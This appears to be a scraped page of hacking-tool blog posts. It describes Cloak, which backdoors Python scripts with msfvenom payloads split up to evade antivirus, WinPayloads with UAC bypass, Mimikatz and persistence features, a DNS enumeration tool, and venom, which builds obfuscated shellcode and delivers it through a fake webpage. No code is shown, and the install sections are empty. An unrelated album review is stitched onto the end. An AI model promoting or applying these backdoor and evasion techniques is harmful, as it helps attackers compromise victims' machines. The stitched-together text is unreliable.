What it exactly does? Cloak generates a Python payload via msfvenom and then intelligently injects it into the python script you specify. |
| Cloak logo |
To evade basic detection, Cloak breaks the payload into several parts and places it in different places in the code. If you want the victim to run your injected script as root, Cloak can handle that too. Cloak will be further upgraded in future to support a wide range of payloads, platforms and evasion techniques.
Compatibility: Cloak works best on Linux and is compatible with both python2 and python3. Dependencies: Metasploit Framework
Install and Run:
Contribute: For now, Cloak can backdoor python scripts but I am looking forward to do the same for C, Bash and Perl scripts. Currently, the default connection method is https and Cloak creates a staged and reverse payload. So, of course the I will try to extend its capabilities which also includes bypassing lowkey AV solutions in Windows.
If you like the idea, help me achieve the goals. The code is well documented so if you want to contribute you are not going to face any problems. Modify the code, add and improve and start a pull request. If you find a bug in the code don't hesitate to start an issue.
Contact: Email: s0md3v@gmail.com Twitter: @s0md3v
And have something to say about GitHackTools or Cloak? Comment below or share this post from GitHackTools Facebook, GitHackTools Twitter and GitHackTools Google Plus.
WinPayloads written in Python 2.7As usual, Don't upload payloads to any online virus checkers Virus Total Detection - Updated 30/9/2016 - Detected by 8 AV. Read here
For Fully Undetectable Payloads please use the stager functionality Youtube Video:
Install and Run:
Features: * UACBypass - PowerShellEmpire. Copyright (c) 2015, Will Schroeder and Justin Warner. All rights reserved. * PowerUp - PowerShellEmpire. Copyright (c) 2015, Will Schroeder and Justin Warner. All rights reserved. * Invoke-Shellcode. Copyright (c) 2012, Matthew Graeber. All rights reserved. * Invoke-Mimikatz. Copyright (c) 2012, Matthew Graeber. All rights reserved. * Invoke-EventVwrBypass. Matt Nelson (@enigma0x3) * Persistence - Adds payload persistence on reboot * Psexec Spray - Spray hashes until successful connection and psexec payload on target * Upload to local webserver - Easy deployment * Powershell stager - allows invoking payloads in memory & more
Check out the Wiki for installation and more!
Video and Information on Blog (OUTDATED)
And have something to say about GitHackTools or WinPayloads? Comment below or share this post from GitHackTools Facebook, GitHackTools Twitter and GitHackTools Google Plus.
DNSMaper Domain Transfer Detection/Subdomain Enumeration/Banner Detection/Generation Map DNS Zone Transfer Test/SubDomain BruteForce/Banner Version Detect/Generate Map
Features DNSMaper has similar features to many subdomain enumeration tools, such as domain delivery vulnerability detection, subdomain enumeration, and IP address acquisition.
After the improvement, the server WEBServer version detection, the website title acquisition, the latitude and longitude acquisition and the GoogleMap generation function are added.
The code does not repeat the rounding in the enumeration subdomain part, borrowing the subdomain-bruteforcer project code. Due to the rush of code usage, only in MacOS & Python 2.7, Win environment please modify some code.
Install and Run:Using help: python dnsmaper.py -hDemo: Test whitehouse.gov python dnsmaper.py whitehouse.gov
Project reference: DNS enumeration: https://github.com/TheRook/subbrute GoogleMap generates: https://x0day.me/
Author: Le4f
And have something to say about GitHackTools or DNSMaper? Comment below or share this post from GitHackTools Facebook, GitHackTools Twitter and GitHackTools Google Plus.
venom 1.0.15 - Metasploit shellcode Generator/Compiler/Listener Version release : v1.0.15 Author : pedro ubuntu [ r00t-3xp10it ] Codename: Pandora's box (pithos) Suspicious-Shell-Activity (SSA) RedTeam develop @2018
LEGAL DISCLAMERThe author does not hold any responsibility for the bad use of this tool, remember that attacking targets without prior consent is illegal and punished by law.
Install and Run:
FRAMEWORK DESCRIPTION The script will use msfvenom (metasploit) to generate shellcode in diferent formats ( c | python | ruby | dll | msi | hta-psh ) injects the shellcode generated into one template (example: python) "the python funtion will execute the shellcode into ram" and uses compilers like gcc (gnu cross compiler) or mingw32 or pyinstaller to build the executable file, also starts a multi-handler to recive the remote connection (shell or meterpreter session). 'venom generator' tool reproduces some of the technics used by Veil-Evasion.py, unicorn.py, powersploit.py, etc, etc, etc..
"P.S. some payloads are undetectable by AV soluctions... yes!!!" One of the reasons for that its the use of a funtion to execute the 2ยบ stage of shell/meterpreter directly into targets ram the other reazon its the use of external obfuscator/crypters.
HOW DO I DELIVER MY PAYLOADS TO TARGET HOST ? venom 1.0.11 (malicious_server) was build to take advantage of apache2 webserver to deliver payloads (LAN) using a fake webpage writen in html that takes advantage of <iframe> <meta-http-equiv> or "<form>" tags to be hable to trigger payload downloads, the user just needs to send the link provided to target host.
"Apache2 (malicious url) will copy all files needed to your webroot"
Screenshots:
Two years after the great debut Miedo P.V.P. released their the second album via 21 Records and the nine songs are more mature and you can clearly feel the advancement that now end up in mostly four minutes tracks, partly also very poppy. I must admit, I sometimes miss the aggressiveness and harshness of the earlier recordings and not all's my taste. Anyway, suitable for pajama parties, beach evenings, a nice evening for two or housework.
